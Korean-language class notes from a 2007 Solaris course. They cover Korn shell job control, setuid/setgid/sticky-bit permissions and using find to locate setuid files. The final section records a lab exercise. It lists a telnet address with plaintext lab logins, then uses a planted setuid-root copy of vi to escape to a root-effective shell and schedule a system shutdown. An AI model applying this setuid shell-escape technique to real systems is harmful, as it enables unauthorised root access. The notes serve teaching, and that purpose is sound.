Solaris_2007.09.18.txt job in the Korn Shell
jobs ==> background로 실행된 프로세스 리스트 출력
bg %n ==> background 변경
fg %n ==> forground 변경
stop %n ==> background stop
server [/export/home/unix1]$ jobs
[3] + Running sleep 1000 &
[2] - Running sleep 400 &
[1] Running sleep 500 &
+가 우선순위 제일 높고 -가 그 다음...
server [/export/home/unix1]$ fg
sleep 1000
^Cserver [/export/home/unix1]$
server [/export/home/unix1]$
server [/export/home/unix1]$ jobs
[2] + Running sleep 400 &
[1 - Running sleep 500 &
server [/export/home/unix1]$
server [/export/home/unix1]$ fg %1
sleep 500
^Z[1] + Stopped (SIGTSTP) &nbp; sleep 500 &
[2] - Done sleep 400 &
server [/export/home/unix1]$
server [/export/home/unix1]$ bg %1
[1] sleep 500 &
server [/export/home/unix1]$
server [/export/home/unix1]$ jobs
[1] + Running sleep 500 &
server [/export/home/unix1]$
server [/export/home/unix1]$ sleep 1000 &
[1] 405
server [/export/home/unix1]$ sleep 2000 &
[2] 406
server [/export/home/unix1]$ sleep 3000 &
[3] 407
server [/export/home/unix1]$
server [/export/home/unix1]$ jobs
[3] + Running sleep 3000 &
[2] - Running sleep 2000 &
[1] Running sleep 1000 &
server [/export/home/unix1]$
server [/export/home/unix1]$ kill %3
[3] + Terminated sleep 3000 &
server [/export/home/unix1]$
server [/export/home/unix1]$ jobs
[2] + Running sleep 2000 &
[1] - Running nbsp; sleep 1000 &
server [/export/home/unix1]$
server [/export/home/unix1]$ kill -9 %1
[1] - Killed &nsp; sleep 1000 &
server [/export/home/unix1]$
server [/export/home/unix1]$ jobs
[2] + Running sleep 2000 &
server [/export/home/unix1]$
server [/export/home/unix1]$
s : --s------ ==> set uid : 실행하는 동안 소유자 권한을 갖는 퍼미션
s : -----s--- ==> set gid : 실행하는 동안 그룹의 권한을 갖는 퍼미션
t : --------t ==> : 소유자만 파일을 삭제
server [/tmp]#
server [/tmp]# mkdir -p a/b/c/d/e
server [/tmp]#
server [/tmp]#
server [/tmp]# touch a/sun.txt
server [/tmp]# touch a/b/sun.txt
server [/tmp]# touch a/b/c/sun.txt
server [/tmp]# touch a/b/c/d/sun.txt
server [/tmp]# touch a/b/c/d/e/sun.txt
server [/tmp]#
server [/tmp]#
server [/tmp]#
server [/tmp]# du -a
0 ./.X11-unix/X0
8 ./.X11-unix
0 ./.X11-pipe/X0
8 ./.X11-pipe
0 ./a/b/c/d/e/sun.txt
8 ./a/b/c/d/e
0 ./a/b/c/d/sun.txt
16 ./a/b/c/d
0 ./a/b/c/sun.txt
24 ./a/b/c
0 ./a/b/sun.txt
32 ./a/b
0 ./a/sun.txt
40 ./a
64 .
server [/tmp]#
erver [/tmp]#
server [/tmp]# chmod 700 a/b/c
server [/tmp]#
server [/tmp]# find /tmp -name sun.txt
/tmp/a/b/c/d/e/sun.txt
/tmp/a/b/c/d/sun.txt
/tmp/a/b/c/sun.txt
/tmp/a/b/sun.txt
/tmp/a/sun.txt
server [/tmp]#
server [/tmp]$
server [/tmp]$ find /mp -name sun.txt
find: cannot read dir /tmp/a/b/c: Permission denied
/tmp/a/b/sun.txt
/tmp/a/sun.txt
server [/tmp]$
server [/tmp]$
server [/tmp]$ ls -l /usr/bin/passwd
-r-sr-sr-x 1 root sys 22168 11월 4 2002 /usr/bin/passwd
server [/tmp]$
unix1 계정에서 passwd 명령을 실행 했으나..
server [/tmp]$
server [/tmp]$ passwd
passwd: Changing password for unix1
Enter existing login password:
root 계정에서 확인해 보면 위의 passwd 명령이 root 권한으로 실행 된 것을 확인.
server [/tmp]#
server [/tmp]# ps -ef | grep passwd
root 444 393 0 10:55:40 pts/2 0:00 passwd
server [/tmp]#
server [/tmp]#
set uid와 set gid 변경
server [/tmp]#
server [/tmp]# pwd
/tmp
server [/tmp]#
server [/tmp]# echo "hello unix" > bb
server [/tmp]#
server [/tmp]# ls -l bb
-rw-r--r-- 1 root other 11 9월 18 11:01 bb
server [/tmp]#
server [/tmp]# umask
022
server [/tmp]#
server [/tmp]# chmod 4744 bb
server [/tmp]#
server [/tmp]# ls -l bb
-rwsr--r-- 1 root other 11 9월 18 11:01 bb
server [/tmp]#
server [/tmp]# chmod 6555 bb
server [/tmp]#
server [/tmp]# ls -l bb
-r-sr-sr-x 1 root other 11 9월 18 11:01 bb
server [/tmp]#
server [/tmp]#
server [tmp]# cd /var
server [/var]# mkdir share
server [/var]#
drwxr-xr-x 2 root other 512 9월 18 11:03 share
share 디렉토리를 공유하기 위해 퍼미션을 777로 주면 파일을 다른 계정으로 삭제 가능.
server [/var]#
sever [/var]# chmod 777 share
server [/var]#
drwxrwxrwx 2 root other 512 9월 18 11:03 share
server [/var]#
share 디렉토리를 공유하기 위해 퍼미션을 1777로 주면 파일을 다른 계정으로 삭제 불가능.
server [/var]#
server [/var]# chmod 1777 share
server [/var]#
drwxrwxrwt 2 root other 512 9월 18 11:03 share
server [/var]#
-perm 4000 하면 4000에 해당 된 것만 찾고 -perm -4000 하면 4000~4777에 해당되는 것들을 찾아준다.
server [/sbin]#
server [/sbin]# find /usr/sbin -perm -4000
/usr/sbin/i86/whodo
/usr/sbin/allocate
/usr/sbin/sacadm
/usr/sbin/traceroute
/usr/sbin/deallocate
/usr/sbin/list_devices
/usr/sbin/ping
/usr/sbin/pmconfig
/usr/sbin/lpmove
/usr/sbin/smpatch
/usr/sbin/static/rcp
server [/sbin]#
server [/sbin]#
telnet : 128.134.83.111
ID : g1~g5
PW : hacker
ID : kkk
PW : kkk
$
$ find /etc -perm -4000 2> /dev/null
/etc/lp/alerts/printer
/etc/ppp/vi_attack
$
$
$ ls -l /etc/ppp/vi_attack
-rwsr-x--- 1 root attack 201876 11월 6 11:17 /etc/ppp/vi_attack
$
$
$ find /var -perm -2000 2> /dev/null
/var/spool/lp/attack
$
$
$ cd /var/spool/lp
$ l
total 380
drwxrwxr-x 2 lp lp 512 9월 6 2007 admins
-rwxr-sr-x 1 root attack 179500 11 6 11:12 attack
lrwxrwxrwx 1 root root 23 9월 6 2007 bin -> ../../../usr/lib/lp/bin
lrwxrwxrwx 1 root root &nbp; 13 9월 6 2007 logs -> ../../lp/logs
lrwxrwxrwx 1 root root 25 9월 6 2007 model -> ../../../usr/lib/lp/model
drwxrwxr-x 2 lp lp 512 9월 6 2007 requests
drwxrwxr-x 2 lp lp 512 9월 6 2007 system
$
$
$ ./attack
$
$ /etc/ppp/vi_attack
:id -a
id: Not an editor command
:! id -a
uid=2013(g5) gid=1(other) euid=0(root) egid=205(attack) groups=1(other)
!
:
No lines in the buffer
:/usr/sbin/shutdown -i5 -g3600 -y
No lines in the buffer
:! /usr/sbin/shutdown -i5 -g3600 -y
/usr/sbin/shutdown: Only root can run /usr/sbin/shutdown
!
:Broadcast Message from root (pts/6) on server 목 11월 6 11:45:02...
The system server will be shut down in 1 hour
No lines in the buffer
:Q
Q: Not an editor command
:q!
$
